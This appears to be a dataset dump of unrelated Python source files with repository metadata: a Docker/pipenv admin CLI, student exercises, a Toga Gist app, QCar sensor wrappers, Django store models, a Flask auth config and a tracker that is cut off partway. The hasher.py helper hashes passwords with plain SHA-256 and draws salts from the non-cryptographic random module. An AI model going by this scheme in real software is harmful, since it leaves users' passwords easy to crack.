dotenv_file["CORE_YARN_VER"] = ver
dotenv_file.dump_to_env()
package_json_file["engines"]["yarn"] = ver
package_json_file.dump()
self.containers_ground_up(cache=False)
def update_postgres(self, ver):
dotenv_template_file["CORE_POSTGRES_VER"] = ver
dotenv_file["CORE_POSTGRES_VER"] = ver
dotenv_file.dump_to_env()
self.containers_ground_up(cache=False)
def update_compose(self, ver):
ver = str(ver)
dotenv_template_file["CORE_COMPOSE_VER"] = ver
dotenv_file["CORE_COMPOSE_VER"] = ver
dotenv_file.dump_to_env()
compose_file["version"] = ver
compose_file.dump()
self.containers_ground_up(cache=False)
def update_python(self, ver):
log.info("Reinstalling your pipenv")
subprocess.run(["pipenv", "--rm"], check=True)
pipfile_file["requires"]["python_version"] = ver
pipfile_file.dump()
subprocess.run(["pipenv", "update", "--keep-outdated", "--dev"], check=True)
dotenv_template_file["CORE_PYTHON_VER"] = ver
dotenv_file["CORE_PYTHON_VER"] = ver
dotenv_file.dump_to_env()
self.containers_ground_up(cache=False)
gitlab_ci_file["variables"]["PYTHON_VERSION"] = ver
gitlab_ci_file.dump()
runtime_txt_file.data = [f"python-{ver}"]
runtime_txt_file.dump()
if self.running_in_vscode:
_update_virtualenv_vscode_pythonpath()
def update_node(self, ver):
dotenv_template_file["CORE_NODE_VER"] = ver
dotenv_file["CORE_NODE_VER"] = ver
dotenv_file.dump_to_env()
self.containers_ground_up(cache=False)
gitlab_ci_file["variables"]["NODE_VERSION"] = ver
gitlab_ci_file.dump()
package_json_file["engines"]["node"] = ver
package_json_file.dump()
def containers_build(self, cache=True):
log.info(f"Building containers with 'cache={cache}'")
subprocess.run(shlex.split(f"docker-compose build --force-rm {'' if cache else '--no-cache'}"), check=True)
def containers_logs(self, container_name=""):
try:
subprocess.run(shlex.split(f"docker-compose logs -f {container_name}"))
except KeyboardInterrupt:
pass
def containers_up(self):
log.info("Running containers")
subprocess.run(shlex.split("docker-compose up --detach --remove-orphans --force-recreate"), check=True)
def containers_ground_up(self, cache=True):
self.containers_build(cache=cache)
self.containers_up()
def init(self):
self.containers_ground_up(cache=False)
_install_pre_commit()
if self.running_in_vscode:
_update_virtualenv_vscode_pythonpath()
def install_pip(self, package, dev=False):
subprocess.run(shlex.split(f"pipenv install {package} {'--dev' if dev else ''}"), check=True)
self.containers_ground_up(cache=False)
def install_yarn(self, package, dev=False):
subprocess.run(
shlex.split(f"sudo {yarn_dir + yarn_executable} add {package} {'--dev' if dev else ''}"), check=True
)
self.containers_ground_up(cache=False)
def remove_pip(self, package):
subprocess.run(["pipenv", "uninstall", package], check=True)
self.containers_ground_up(cache=False)
def remove_yarn(self, package):
subprocess.run(["sudo", yarn_dir + yarn_executable, "remove", package], check=True)
self.containers_ground_up(cache=False)
if __name__ == "__main__":
log.info("Starting admin script")
_verify_versions()
fire.Fire(CLI)
| 32.324324
| 148
| 0.67879
| 4,030
| 0.561594
| 0
| 0
| 0
| 0
| 0
| 0
| 1,708
| 0.238016
|
5542f0b7bef41dfe29c0868984e349d2a0c056ea
| 300
|
py
|
Python
|
F_Machine_learning/2_Unsupervised-Learning/solutions/ex2_3.py
|
sylvain2002/CBM101
|
4d9dc4264ce81cc2af58ceaff96fd0ed7a570af5
|
[
"MIT"
] | 7
|
2019-07-03T07:41:55.000Z
|
2022-02-06T20:25:37.000Z
|
F_Machine_learning/2_Unsupervised-Learning/solutions/ex2_3.py
|
sylvain2002/CBM101
|
4d9dc4264ce81cc2af58ceaff96fd0ed7a570af5
|
[
"MIT"
] | 9
|
2019-03-14T15:15:09.000Z
|
2019-08-01T14:18:21.000Z
|
F_Machine_learning/2_Unsupervised-Learning/solutions/ex2_3.py
|
sylvain2002/CBM101
|
4d9dc4264ce81cc2af58ceaff96fd0ed7a570af5
|
[
"MIT"
] | 11
|
2019-03-12T10:43:11.000Z
|
2021-10-05T12:15:00.000Z
|
a = 'ARRYR'
b = 'ARSYS'
levenshtein(a,b)
# ANSWER a)
# It quantifies the number of single-letter changes to morph one into the other
#
# ANSWER b)
# We could encode the 'price' of changing between particular amino acids
# thereby acknowledging that some substitutions are more or less costly/likely
| 27.272727
| 79
| 0.756667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 266
| 0.886667
|
5543d0392b1a991c4c0bc9b77494d93272ec2802
| 743
|
py
|
Python
|
tests/components/pages/ts.py
|
T4rk1n/dazzler
|
69c49422dc19c910445ab265b1d3481041de8f43
|
[
"MIT"
] | 15
|
2019-12-19T11:57:30.000Z
|
2021-11-15T23:34:41.000Z
|
tests/components/pages/ts.py
|
T4rk1n/dazzler
|
69c49422dc19c910445ab265b1d3481041de8f43
|
[
"MIT"
] | 196
|
2019-09-21T15:10:14.000Z
|
2022-03-31T11:07:48.000Z
|
tests/components/pages/ts.py
|
T4rk1n/dazzler
|
69c49422dc19c910445ab265b1d3481041de8f43
|
[
"MIT"
] | 7
|
2019-10-30T19:38:15.000Z
|
2021-12-01T04:54:16.000Z
|
from dazzler.system import Page
from dazzler.components import core
from tests.components import ts_components as tsc
page = Page(
__name__,
core.Container([
tsc.TypedComponent(
'override',
children=core.Container('foobar'),
num=2,
text='foobar',
boo=True,
arr=[1, 2, 'mixed'],
arr_str=['foo', 'bar'],
arr_num=[7, 8, 9],
arr_obj_lit=[{'name': 'foo'}],
obj={'anything': 'possible'},
enumeration='foo',
union=7,
style={'border': '1px solid rgb(0,0,255)'},
class_name='other'
),
tsc.TypedClassComponent('class based', children='clazz')
])
)
| 27.518519
| 64
| 0.51144
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 138
| 0.185734
|
55454283c60ef0107317118c446ed4395d8f58a5
| 4,464
|
py
|
Python
|
src/gistsgetter/app.py
|
pmfrank/gistsgetter
|
a19f59604ebf1cb13c641d25c4461b4347bba58a
|
[
"MIT"
] | null | null | null |
src/gistsgetter/app.py
|
pmfrank/gistsgetter
|
a19f59604ebf1cb13c641d25c4461b4347bba58a
|
[
"MIT"
] | null | null | null |
src/gistsgetter/app.py
|
pmfrank/gistsgetter
|
a19f59604ebf1cb13c641d25c4461b4347bba58a
|
[
"MIT"
] | null | null | null |
"""
An application dedicated to creating, editing, and deleting Gists in GitHub
"""
from __future__ import absolute_import
import toga
import pyperclip
from toga.style import Pack
from toga.style.pack import COLUMN, ROW
from .common.Search import search
from functools import partial
class GistsGetter(toga.App):
def startup(self):
"""
Construct and show the Toga application.
Usually, you would add your application to a main content box.
We then create a main window (with a name matching the app), and
show the main window.
"""
main_box = toga.Box(style=Pack(direction=COLUMN))
top_box = toga.Box(style=Pack(direction=ROW, padding=5, alignment='top'))
middle_box = toga.Box(style=Pack(direction=ROW,padding=5, alignment='center', flex=1))
button_box = toga.Box(style=Pack(padding=5, alignment='right'))
bottom_box = toga.Box(style=Pack(direction=ROW, padding=(5,5,20,5), alignment='bottom')) # Padding - Top, Right, Botom, Left
select_label = toga.Label('Search By', style=Pack(padding=5, alignment='center'))
self.select = toga.Selection(items=['UserID','GistID'])
self.select_input = toga.TextInput(style=Pack(padding=5, flex=1),placeholder='User or Gist ID')
# Line preserved for prostarity will be using helper functions to do search with externale functions
# select_button = toga.Button('Search',style=Pack(padding=5),on_press=partial(search,string = 'x'))
select_button = toga.Button('Search', style=Pack(padding=5), on_press=self.search_by)
self.results = toga.MultilineTextInput(style=Pack(padding=(0,5), flex=1),readonly = True)
copy_button = toga.Button('Copy to Clipboard', style=Pack(padding=5),on_press=self.copy_to_clipboard)
button_box.add(copy_button)
middle_box.add(self.results)
middle_box.add(button_box)
top_box.add(select_label)
top_box.add(self.select)
top_box.add(self.select_input)
top_box.add(select_button)
login_label = toga.Label('Username', style=Pack(padding=5, alignment='left'))
self.login_input = toga.TextInput(style=Pack(padding=5,alignment='left',flex=1))
pw_label = toga.Label('Password', style=Pack(padding=5, alignment='right'))
self.pw_input = toga.PasswordInput(style=Pack(padding=4,alignment='right',flex=1))
bottom_box.add(login_label)
bottom_box.add(self.login_input)
bottom_box.add(pw_label)
bottom_box.add(self.pw_input)
main_box.add(top_box)
main_box.add(middle_box)
main_box.add(bottom_box)
self.main_window = toga.MainWindow(title=self.formal_name, size=(640,480))
self.main_window.content = main_box
self.main_window.show()
def search_by(self, widget):
global results
if not self.select_input.value or not self.login_input.value or not self.pw_input:
self.results.value = 'All fields required'
return
if self.select.value == 'UserID':
self.results.value = 'Feature not implemented'
return
else:
global gist_id
gist_id = self.select_input.value
url = self.__get_token('https://api.github.com/gists{/gist_id}','{')
results = search(url, self.login_input.value,self.pw_input.value)
for filename in results:
print(results[filename])
self.results.value = results
def copy_to_clipboard(self, widget):
global results
for filename in results:
pyperclip.copy(results[filename])
def __get_token(self, string, delim):
tokens = string.split(delim)
url = tokens[0]
for token in tokens[1:]:
token = token[:-1]
if '/' in token : token = token[1:]
if token in globals():
if '=' in url:
url = url + globals()[token]
else:
url = url + '/' + globals()[token]
if ',' in token:
token = token[1:]
print(token)
multitokens = token.split(',')
for multitoken in multitokens:
if multitoken in globals():
url = url + '&' + multitoken + '=' + globals()[multitoken]
return url
def main():
return GistsGetter()
| 38.817391
| 132
| 0.622536
| 4,140
| 0.927419
| 0
| 0
| 0
| 0
| 0
| 0
| 827
| 0.18526
|
5549b2fc2c6d6a256c772a1fa6b1cb0ba16583fe
| 7,401
|
py
|
Python
|
src/qcar/src/qcar/q_essential.py
|
bchampp/scylla
|
6ec27877cc03c200a874cd0eb25a36c866471250
|
[
"MIT"
] | null | null | null |
src/qcar/src/qcar/q_essential.py
|
bchampp/scylla
|
6ec27877cc03c200a874cd0eb25a36c866471250
|
[
"MIT"
] | null | null | null |
src/qcar/src/qcar/q_essential.py
|
bchampp/scylla
|
6ec27877cc03c200a874cd0eb25a36c866471250
|
[
"MIT"
] | null | null | null |
from quanser.hardware import HIL, HILError, PWMMode
from quanser.multimedia import Video3D, VideoCapture, Video3DStreamType, MediaError, ImageFormat, ImageDataType
from quanser.devices import RPLIDAR, RangingMeasurements, RangingMeasurementMode, DeviceError, RangingDistance
from .q_misc import Utilities
import numpy as np
import pygame
import time
saturate = Utilities.saturate
# region: Cameras
class Camera3D():
def __init__(self, mode='RGB&DEPTH', frame_width_RGB=1920, frame_height_RGB=1080, frame_rate_RGB=30.0, frame_width_depth=1280, frame_height_depth=720, frame_rate_depth=15.0, device_id='0'):
'''This function configures the Intel Realsense RGB and depth cameras for use.
Outputs:
video3d - video3d object, you must call video3d.start_streaming() before your main loop
stream_RGB - stream object to be passed to the read method
image_buffer_RGB - buffer array that will be updated by the read method
stream_depth - stream object to be passed to the read method
image_buffer_depth - buffer array that will be updated by the read method'''
self.mode = mode
self.stream_index = 0
self.image_buffer_RGB = np.zeros((frame_height_RGB, frame_width_RGB, 3), dtype=np.uint8)
self.image_buffer_depth_px = np.zeros((frame_height_depth, frame_width_depth, 1), dtype=np.uint8)
self.image_buffer_depth_m = np.zeros((frame_height_depth, frame_width_depth, 1), dtype=np.float32)
try:
self.video3d = Video3D(device_id)
if mode == 'RGB':
self.stream_RGB = self.video3d.stream_open(Video3DStreamType.COLOR, self.stream_index, frame_rate_RGB, frame_width_RGB, frame_height_RGB, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8)
elif mode == 'DEPTH':
self.stream_depth = self.video3d.stream_open(Video3DStreamType.DEPTH, self.stream_index, frame_rate_depth, frame_width_depth, frame_height_depth, ImageFormat.ROW_MAJOR_GREYSCALE, ImageDataType.UINT8)
else:
self.stream_RGB = self.video3d.stream_open(Video3DStreamType.COLOR, self.stream_index, frame_rate_RGB, frame_width_RGB, frame_height_RGB, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8)
self.stream_depth = self.video3d.stream_open(Video3DStreamType.DEPTH, self.stream_index, frame_rate_depth, frame_width_depth, frame_height_depth, ImageFormat.ROW_MAJOR_GREYSCALE, ImageDataType.UINT8)
self.video3d.start_streaming()
except MediaError as me:
print(me.get_error_message())
def terminate(self):
'''This function terminates the RGB and depth video and stream objects correctly.
Inputs:
video3d - video object from the configure method
stream_RGB - RGB stream object from the configure method
stream_depth - depth stream object from the configure method '''
try:
self.video3d.stop_streaming()
if self.mode == 'RGB':
self.stream_RGB.close()
elif self.mode == 'DEPTH':
self.stream_depth.close()
else:
self.stream_RGB.close()
self.stream_depth.close()
self.video3d.close()
except MediaError as me:
print(me.get_error_message())
def read_RGB(self):
'''This function reads an image from the RGB camera for use.
Outputs:
timestamp - timestamp corresponding to the frame read '''
timestamp = -1
try:
frame = self.stream_RGB.get_frame()
while not frame:
frame = self.stream_RGB.get_frame()
frame.get_data(self.image_buffer_RGB)
timestamp = frame.get_timestamp()
frame.release()
except KeyboardInterrupt:
pass
except MediaError as me:
print(me.get_error_message())
finally:
return timestamp
def read_depth(self, dataMode='px'):
'''This function reads an image from the depth camera for use.
dataMode is 'px' for pixels or 'm' for meters. Use corresponding image buffer.
Outputs:
timestamp - timestamp corresponding to the frame read '''
timestamp = -1
try:
frame = self.stream_depth.get_frame()
while not frame:
frame = self.stream_depth.get_frame()
if dataMode == 'px':
frame.get_data(self.image_buffer_depth_px)
elif dataMode == 'm':
frame.get_meters(self.image_buffer_depth_m)
timestamp = frame.get_timestamp()
frame.release()
except KeyboardInterrupt:
pass
except MediaError as me:
print(me.get_error_message())
finally:
return timestamp
class Camera2D():
def __init__(self, camera_id="0", frame_width=640, frame_height=480, frame_rate=30.0):
'''This function configures the 2D camera for use based on the camera_id provided.'''
self.url = "video://localhost:"+camera_id
self.image_data = np.zeros((frame_height, frame_width, 3), dtype=np.uint8)
try:
# self.capture = VideoCapture(self.url, frame_rate, frame_width, frame_height, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8, self.image_data, None, 0)
self.capture = VideoCapture(self.url, frame_rate, frame_width, frame_height, ImageFormat.ROW_MAJOR_INTERLEAVED_BGR, ImageDataType.UINT8, None, 0)
self.capture.start()
except MediaError as me:
print(me.get_error_message())
def read(self):
'''This function reads a frame, updating the corresponding image buffer.'''
try:
# self.capture.read()
self.capture.read(self.image_data)
except MediaError as me:
print(me.get_error_message())
except KeyboardInterrupt:
print('User Interupted')
def reset(self):
'''This function resets the 2D camera stream by stopping and starting the capture service.'''
try:
self.capture.stop()
self.capture.start()
except MediaError as me:
print(me.get_error_message())
def terminate(self):
'''This function terminates the 2D camera operation.'''
try:
self.capture.stop()
self.capture.close()
except MediaError as me:
print(me.get_error_message())
# endregion
# region: LIDAR
class LIDAR():
def __init__(self, num_measurements=720):
#
self.num_measurements = num_measurements
# self.measurements = [RangingMeasurement() for x in range(self.num_measurements)]
# self.measurements = RangingMeasurements(num_measurements)
self.measurements = RangingMeasurements(num_measurements)
self.distances = np.zeros((num_measurements,1), dtype=np.float64)
self.angles = np.zeros((num_measurements,1), dtype=np.float64)
# self.angles = np.linspace(0, 2*np.pi-(2*np.pi/num_measurements), num_measurements, dtype=np.float64)
self.lidar = RPLIDAR()
# self.maxDistance = 18.0
try:
self.lidar.open("serial-cpu://localhost:2?baud='115200',word='8',parity='none',stop='1',flow='none',dsr='on'", RangingDistance.LONG)
except DeviceError as de:
if de.error_code == -34:
pass
else:
print(de.get_error_message())
def terminate(self):
try:
self.lidar.close()
except DeviceError as de:
if de.error_code == -34:
pass
else:
print(de.get_error_message())
def read(self):
try:
self.lidar.read(RangingMeasurementMode.NORMAL, 0, 0, self.measurements)
self.distances = np.array(self.measurements.distance)
# self.distances = np.append( np.flip( self.distances[0:int(self.num_measurements/4)] ) ,
# np.flip( self.distances[int(self.num_measurements/4):]) )
# self.distances[self.distances > self.maxDistance] = self.maxDistance
# self.distances[self.distances > self.maxDistance] = 0
self.angles = np.array(self.measurements.heading)
except DeviceError as de:
if de.error_code == -34:
pass
else:
print(de.get_error_message())
# endregion
| 37.190955
| 211
| 0.740576
| 6,952
| 0.939333
| 0
| 0
| 0
| 0
| 0
| 0
| 2,384
| 0.322119
|
554a7b61e03b3173856a7a579bde9d2c36a7f575
| 1,689
|
py
|
Python
|
ex071.py
|
cristianoandrad/ExerciciosPythonCursoEmVideo
|
362603436b71c8ef8386d7a9ab3c5fed0b8d63f7
|
[
"MIT"
] | null | null | null |
ex071.py
|
cristianoandrad/ExerciciosPythonCursoEmVideo
|
362603436b71c8ef8386d7a9ab3c5fed0b8d63f7
|
[
"MIT"
] | null | null | null |
ex071.py
|
cristianoandrad/ExerciciosPythonCursoEmVideo
|
362603436b71c8ef8386d7a9ab3c5fed0b8d63f7
|
[
"MIT"
] | null | null | null |
'''Crie um programa que simule o funcionamento de um caixa eletrônico. No início, pergunte ao usuário qual será o valor a ser sacado (número inteiro) e o programa vai informar quantas cédulas de cada valor serão entregues. OBS:
considere que o caixa possui cédulas de R$50, R$20, R$10 e R$1.'''
'''print('--' * 15)
print('{:^30}'.format('Banco CEV'))
print('--' * 15)
valor = int(input('Qual o valor que você quer sacar R$ '))
c50 = valor % 50
c20 = c50 % 20
c10 = c20 % 10
c1 = c10 % 1
b50 = valor - c50
b20 = valor - b50 - c20
b10 = valor - b50 - b20 - c10
b1 = valor - b50 - b20 - b10 - c1
print(f'Total de {b50/50:.0f} celulas de R$ 50,00')
print(f'Total de {b20/20:.0f} celulas de R$ 20,00')
print(f'Total de {b10/10:.0f} celulas de R$ 10,00')
print(f'Total de {b1/1:.0f} celulas de R$ 1,00')
print('--' * 15)
print('Volte sempre ao Banco CEV! Tenha um bom dia')'''
'''valor = int(input("informe o valor a ser sacado : "))
nota50 = valor // 50
valor %= 50
nota20 = valor // 20
valor %= 20
nota10 = valor // 10
valor %= 10
nota1 = valor // 1
print(f"notas de 50 = {nota50}")
print(f"notas de 20 = {nota20}")
print(f"notas de 10 = {nota10}")
print(f"notas de 1 = {nota1}")'''
print('--' * 15)
print('{:^30}'.format('Banco CEV'))
print('--' * 15)
valor = int(input('Qual o valor que você quer sacar R$ '))
total = valor
cel = 50
contCel = 0
while True:
if total >= cel:
total -= cel
contCel += 1
else:
print(f'O total de {contCel} céluldas de R$ {cel}.')
if cel == 50:
cel = 20
elif cel == 20:
cel = 10
elif cel == 10:
cel = 1
contCel = 0
if total == 0:
break
| 27.241935
| 227
| 0.587922
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,297
| 0.762941
|
554c5ff1d984eee7cf69842945a06a7b43f122ff
| 919
|
py
|
Python
|
common.py
|
hoostus/prime-harvesting
|
6606b94ea7859fbf217dbea4ace856e3fa4d154e
|
[
"BlueOak-1.0.0",
"Apache-2.0"
] | 23
|
2016-09-07T06:13:37.000Z
|
2022-02-17T23:49:03.000Z
|
common.py
|
hoostus/prime-harvesting
|
6606b94ea7859fbf217dbea4ace856e3fa4d154e
|
[
"BlueOak-1.0.0",
"Apache-2.0"
] | null | null | null |
common.py
|
hoostus/prime-harvesting
|
6606b94ea7859fbf217dbea4ace856e3fa4d154e
|
[
"BlueOak-1.0.0",
"Apache-2.0"
] | 12
|
2016-06-30T17:27:39.000Z
|
2021-12-12T07:54:27.000Z
|
import itertools
import math
import simulate
import harvesting
import plot
from decimal import setcontext, ExtendedContext
# Don't raise exception when we divide by zero
#setcontext(ExtendedContext)
#getcontext().prec = 5
def compare_prime_vs_rebalancing(series, years=30, title=''):
(r1, r2) = itertools.tee(series)
x = simulate.withdrawals(r1, years=years)
y = simulate.withdrawals(r2, years=years, harvesting=harvesting.N_60_RebalanceHarvesting)
s1 = [n.withdraw_r for n in x]
s2 = [n.withdraw_r for n in y]
ceiling = max(max(s1), max(s2))
if ceiling < 100000:
ceiling = int(math.ceil(ceiling / 10000) * 10000)
else:
ceiling = int(math.ceil(ceiling / 100000) * 100000)
plot.plot_two(s1, s2, s1_title='Prime Harvesting', s2_title='Annual Rebalancing',
y_lim=[0,ceiling],
x_label='Year of Retirement', title=title)
| 31.689655
| 93
| 0.677911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 156
| 0.16975
|
554e5d74e0feb6600546ab4240369b860c3f874d
| 492
|
py
|
Python
|
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
|
chhschou/sandpit
|
d4a6760905b45b90455f10a5b50af3c5f743e445
|
[
"MIT"
] | null | null | null |
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
|
chhschou/sandpit
|
d4a6760905b45b90455f10a5b50af3c5f743e445
|
[
"MIT"
] | null | null | null |
g/appengine/py/standard/simple-blog/app/helpers/hasher.py
|
chhschou/sandpit
|
d4a6760905b45b90455f10a5b50af3c5f743e445
|
[
"MIT"
] | null | null | null |
import random
import string
import hashlib
def make_salt():
return ''.join(random.choice(string.letters) for x in xrange(5))
# Implement the function valid_pw() that returns True if a user's password
# matches its hash. You will need to modify make_pw_hash.
def make_pw_hash_with_salt(name, pw, salt):
h = hashlib.sha256(name + pw + salt).hexdigest()
return '%s|%s' % (h, salt)
def make_pw_hash(name, pw):
s = make_salt()
return make_pw_hash_with_salt(name, pw, s)
| 23.428571
| 74
| 0.707317
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 140
| 0.284553
|
554ef62e12daf1b4dd0a910c08086098d9a39602
| 769
|
py
|
Python
|
tests/hdx/scraper/test_utils.py
|
mcarans/hdx-python-scraper
|
ce17c672591979d4601bd125a38b86ea81a9f3c4
|
[
"MIT"
] | null | null | null |
tests/hdx/scraper/test_utils.py
|
mcarans/hdx-python-scraper
|
ce17c672591979d4601bd125a38b86ea81a9f3c4
|
[
"MIT"
] | null | null | null |
tests/hdx/scraper/test_utils.py
|
mcarans/hdx-python-scraper
|
ce17c672591979d4601bd125a38b86ea81a9f3c4
|
[
"MIT"
] | null | null | null |
from datetime import datetime
from hdx.data.dataset import Dataset
from hdx.scraper.utilities import (
get_isodate_from_dataset_date,
string_params_to_dict,
)
class TestUtils:
def test_string_params_to_dict(self):
result = string_params_to_dict("a: 123, b: 345")
assert result == {"a": "123", "b": "345"}
result = string_params_to_dict("a:123,b:345")
assert result == {"a": "123", "b": "345"}
def test_get_isodate_from_dataset_date(self, configuration):
dataset = Dataset(
{
"dataset_date": "[2022-01-11T02:24:08.241 TO 2022-01-11T02:24:08.241]"
}
)
result = get_isodate_from_dataset_date(dataset, datetime.now())
assert result == "2022-01-11"
| 29.576923
| 86
| 0.629389
| 597
| 0.776333
| 0
| 0
| 0
| 0
| 0
| 0
| 141
| 0.183355
|
554fb560fa2735d2073c8f53fb708577f43575e0
| 3,796
|
py
|
Python
|
store/models.py
|
Dokeey/Buy-Sell
|
9d70eb8649d79962657cc4be896e437908de537b
|
[
"MIT"
] | 7
|
2019-03-25T14:43:41.000Z
|
2021-09-16T01:44:41.000Z
|
store/models.py
|
Dokeey/Buy-Sell
|
9d70eb8649d79962657cc4be896e437908de537b
|
[
"MIT"
] | 80
|
2019-03-25T09:25:00.000Z
|
2020-02-09T01:01:09.000Z
|
store/models.py
|
Dokeey/Buy-Sell
|
9d70eb8649d79962657cc4be896e437908de537b
|
[
"MIT"
] | 4
|
2019-03-25T13:58:07.000Z
|
2021-11-26T09:12:32.000Z
|
from random import randrange
from django.conf import settings
from django.contrib.contenttypes.fields import GenericRelation
from django.db import models
from hitcount.models import HitCountMixin, HitCount
from imagekit.models import ProcessedImageField
from pilkit.processors import ResizeToFill
from django_cleanup import cleanup
from store.fields import DefaultStaticProcessedImageField
def get_random():
rand = randrange(1,10)
return '/static/profile/{}.png'.format(rand)
# @cleanup.ignore
class StoreProfile(models.Model, HitCountMixin):
user = models.OneToOneField(settings.AUTH_USER_MODEL, verbose_name="유저", on_delete=models.CASCADE)
name = models.CharField(max_length=20, verbose_name="가게명", unique=True)
photo = DefaultStaticProcessedImageField(
verbose_name="가게 사진",
null=True,
upload_to='profile/storephoto',
processors=[ResizeToFill(200, 200)],
format='JPEG',
options={'quality': 60}
)
comment = models.TextField(max_length=200, blank=True, verbose_name="소개", default="반갑습니다.")
created_at = models.DateTimeField(verbose_name="생성일", auto_now_add=True)
hit_count_generic = GenericRelation(HitCount, object_id_field='object_pk',
related_query_name='hit_count_generic_relation')
def __str__(self):
return self.name
class Meta:
verbose_name = "가게"
verbose_name_plural = "가게"
ordering = ['-id']
from django.contrib.auth import get_user_model
User = get_user_model()
try:
user_pk = User.objects.get(username='deleteuser').id
except:
user_pk = None
class QuestionComment(models.Model):
store_profile = models.ForeignKey(StoreProfile, verbose_name="가게", on_delete=models.CASCADE)
if user_pk:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.SET_DEFAULT, default=user_pk)
else:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.CASCADE)
comment = models.TextField(verbose_name="문의글", max_length=1000)
created_at = models.DateTimeField(verbose_name="작성일", auto_now_add=True)
updated_at = models.DateTimeField(verbose_name="최근 업데이트", auto_now=True)
parent = models.ForeignKey('self', verbose_name="상위 댓글", null=True, blank=True, related_name='replies', on_delete=models.CASCADE)
def __str__(self):
return self.author.storeprofile.name
class Meta:
ordering = ('-created_at',)
verbose_name = "가게 문의"
verbose_name_plural = "가게 문의"
from trade.models import Item
class StoreGrade(models.Model):
store_profile = models.ForeignKey(StoreProfile, verbose_name="가게", on_delete=models.CASCADE)
if user_pk:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.SET_DEFAULT ,default=user_pk)
else:
author = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name="작성자", on_delete=models.CASCADE)
store_item = models.ForeignKey(Item, verbose_name="구매한 물품", on_delete=models.SET_NULL, null=True)
grade_comment = models.TextField(verbose_name="물품평", max_length=250)
rating = models.PositiveIntegerField(
verbose_name="점수",
choices=(
(1, '★☆☆☆☆'),
(2, '★★☆☆☆'),
(3, '★★★☆☆'),
(4, '★★★★☆'),
(5, '★★★★★')
),
default=0,
db_index=True
)
created_at = models.DateTimeField(verbose_name="작성일", auto_now_add=True)
updated_at = models.DateTimeField(verbose_name="최근 업데이트", auto_now=True)
def __str__(self):
return self.author.storeprofile.name
class Meta:
ordering = ('-created_at',)
verbose_name = "가게 평점"
verbose_name_plural = "가게 평점"
| 36.5
| 133
| 0.692308
| 3,321
| 0.824888
| 0
| 0
| 0
| 0
| 0
| 0
| 592
| 0.147044
|
554fefef5722dcfd6c785e2d4dadd682981a85f8
| 1,361
|
py
|
Python
|
auth-api/app.py
|
dlavery/auth
|
9f37b4be2eeda2446b7d3abd44c7b45918486e0b
|
[
"MIT"
] | null | null | null |
auth-api/app.py
|
dlavery/auth
|
9f37b4be2eeda2446b7d3abd44c7b45918486e0b
|
[
"MIT"
] | null | null | null |
auth-api/app.py
|
dlavery/auth
|
9f37b4be2eeda2446b7d3abd44c7b45918486e0b
|
[
"MIT"
] | null | null | null |
import configparser
import logging
from flask import Flask
from flask_pymongo import PyMongo
from Crypto.PublicKey import RSA
# Value mapping
LOG_LEVELS = {'INFO': logging.INFO, 'DEBUG': logging.DEBUG, 'WARN': logging.DEBUG, 'ERROR': logging.ERROR}
# Create application
app = Flask(__name__)
# Read external config
config = configparser.ConfigParser()
config.read('auth-api.cfg')
app.config['MONGO_DBNAME'] = config['DATABASE']['dbName']
app.config['MONGO_URI'] = config['DATABASE']['dbURI']
logfile = config['LOGGING']['logFile']
loglevel = LOG_LEVELS[config['LOGGING']['logLevel']]
app.config['SERVER_NAME'] = config['APPLICATION']['serverName']
app.config['DEBUG'] = config['APPLICATION']['debug']
# Set up logging
fh = logging.FileHandler(logfile, mode='a', encoding='utf8', delay=False)
fmt = logging.Formatter('%(asctime)s %(levelname)s %(filename)s %(lineno)d %(message)s')
fh.setFormatter(fmt)
app.logger.addHandler(fh)
app.logger.setLevel(loglevel)
# Set up database
mongo = PyMongo(app)
# Get crypto
pubkeyfile = config['PKI']['pubkeyFile']
authpublickey = RSA.import_key(open(pubkeyfile).read()).exportKey()
keyfile = config['PKI']['keyFile']
passphrase = config['PKI']['passPhrase']
authprivatekey = RSA.import_key(open(keyfile).read(), passphrase=passphrase).exportKey()
# Get session secret
app.secret_key = config['SESSIONS']['secretKey']
| 32.404762
| 106
| 0.740632
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 465
| 0.341661
|
5555b6c3e07de5a90e04d4e0ebe99f3c40e0594c
| 1,587
|
py
|
Python
|
experts/siamdw.py
|
songheony/AAA-journal
|
4306fac0afe567269b8d2f1cbef2a1c398fdde82
|
[
"MIT"
] | 9
|
2020-07-07T09:03:07.000Z
|
2021-04-22T03:38:49.000Z
|
experts/siamdw.py
|
songheony/AAA-journal
|
4306fac0afe567269b8d2f1cbef2a1c398fdde82
|
[
"MIT"
] | null | null | null |
experts/siamdw.py
|
songheony/AAA-journal
|
4306fac0afe567269b8d2f1cbef2a1c398fdde82
|
[
"MIT"
] | 1
|
2021-07-31T19:26:52.000Z
|
2021-07-31T19:26:52.000Z
|
import sys
import numpy as np
import cv2
from easydict import EasyDict as edict
from base_tracker import BaseTracker
import path_config
sys.path.append("external/SiamDW/lib")
from tracker.siamrpn import SiamRPN
import models.models as models
from utils.utils import load_pretrain
class SiamDW(BaseTracker):
def __init__(self):
super().__init__("SiamDW")
net_file = path_config.SIAMDW_MODEL
info = edict()
info.arch = "SiamRPNRes22"
info.dataset = "OTB2015"
info.epoch_test = False
info.cls_type = "thinner"
self.tracker = SiamRPN(info)
self.net = models.__dict__[info.arch](anchors_nums=5, cls_type=info.cls_type)
self.net = load_pretrain(self.net, net_file)
self.net.eval()
self.net = self.net.cuda()
def initialize(self, image_file, box):
image = cv2.imread(image_file)
if len(image.shape) == 2:
image = cv2.cvtColor(image, cv2.COLOR_GRAY2BGR)
center = np.array([box[0] + (box[2] - 1) / 2, box[1] + (box[3] - 1) / 2])
size = np.array([box[2], box[3]])
